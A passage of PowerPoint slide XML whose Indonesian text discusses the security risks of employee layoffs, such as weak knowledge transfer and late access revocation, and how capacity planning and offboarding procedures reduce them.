              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberhentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sabotase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko-risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strategis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepegawaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PHK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberhentian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>budaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kesimpulannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PHK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
